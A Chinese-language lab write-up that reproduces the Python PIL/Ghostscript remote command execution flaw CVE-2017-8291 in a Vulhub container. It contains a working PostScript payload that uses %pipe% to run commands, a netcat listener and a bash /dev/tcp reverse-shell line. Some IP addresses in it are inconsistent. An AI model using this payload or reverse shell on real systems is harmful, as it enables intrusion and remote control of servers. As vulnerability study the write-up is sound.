本文主要是介绍Python PIL远程命令执行漏洞复现(CVE-2017-8291 CVE-2017-8291),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
漏洞原理
Python
中处理图片的模块PIL(Pillow)
,因为其内部调用了GhostScript
而受到GhostButt
漏洞(CVE-2017-8291)
的影响,造成远程命令执行漏洞。
漏洞详情
漏洞简述
PIL
内部根据图片头(Magic Bytes)
判断图片类型,如果发现是一个eps文件(头为%!PS),则分发给PIL/EpsImagePlugin.py
处理。
在这个模块中,PIL
调用了系统的gs
命令,也就是GhostScript
来处理图片文件:
command = ["gs","-q", # quiet mode"-g%dx%d" % size, # set output geometry (pixels)"-r%fx%f" % res, # set input DPI (dots per inch)"-dBATCH", # exit after processing"-dNOPAUSE", # don't pause between pages,"-dSAFER", # safe mode"-sDEVICE=ppmraw", # ppm driver"-sOutputFile=%s" % outfile, # output file"-c", "%d %d translate" % (-bbox[0], -bbox[1]),# adjust for image origin"-f", infile, # input file]# 省略判断是GhostScript是否安装的代码
try:with open(os.devnull, 'w+b') as devnull:subprocess.check_call(command, stdin=devnull, stdout=devnull)im = Image.open(outfile)
漏洞复现环境
名称 | 系统名称 | IP地址 |
---|---|---|
攻击机 | kali | 192.168.255.57 |
靶机 | centos7 | 192.168.255.176 |
1、在centos7
中开启docker环境,并拉取Vulhub
漏洞源码
[root@didiplus ~]# git clone https://github.com/vulhub/vulhub.git
2、进入CVE-2017-8291
[root@didiplus CTF]# cd vulhub/python/PIL-CVE-2017-8291/
[root@didiplus PIL-CVE-2017-8291]# ls
01.png app.py docker-compose.yml poc.png README.md
[root@didiplus PIL-CVE-2017-8291]#
3、执行命令docker-compose up -d
,拉取镜像。
[root@didiplus PIL-CVE-2017-8291]# docker-compose up -d
Creating pil-cve-2017-8291_web_1 ... done
[root@didiplus PIL-CVE-2017-8291]# docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
80c159201cad vulhub/ghostscript:9.21-with-flask "python app.py" 6 seconds ago Up 3 seconds 0.0.0.0:8000->8000/tcp pil-cve-2017-8291_web_1
4、在kali下访问靶场:http://192.168.255.167:8000/
5、上传poc.png图片,使用vi打开该文件,内容如下:
...省略...
currentdevice null false mark /OutputFile (%pipe%touch /tmp/aaaaa)
.putdeviceparams
1 true .outputpage
.rsdparams
%{ } loop
0 0 .quit
%asdf
上传文件成功后,会在/tmp/目录下创建aaaaa文件。
6、在docker靶场中查看aaaaa文件,证明是否存在漏洞
成功在tmp目录下创建文件,说明存在漏洞。
通过反弹shell命令获取root权限。
1、在kail(攻击机)上,开启侦听端口8002端口,执行 nc -l -p 8002
2、修改poc.png的命令为反弹shell命令bash –c "bash –i >& /dev/tcp/192.168.32.1/777 0>&1"
3、再次上传后,监听端口成功反弹shell
参考资料:
Python PIL 远程命令执行漏洞(GhostButt CVE-2017-8291 )
Python PIL 远程命令执行漏洞(GhostButt )
这篇关于Python PIL远程命令执行漏洞复现(CVE-2017-8291 CVE-2017-8291)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!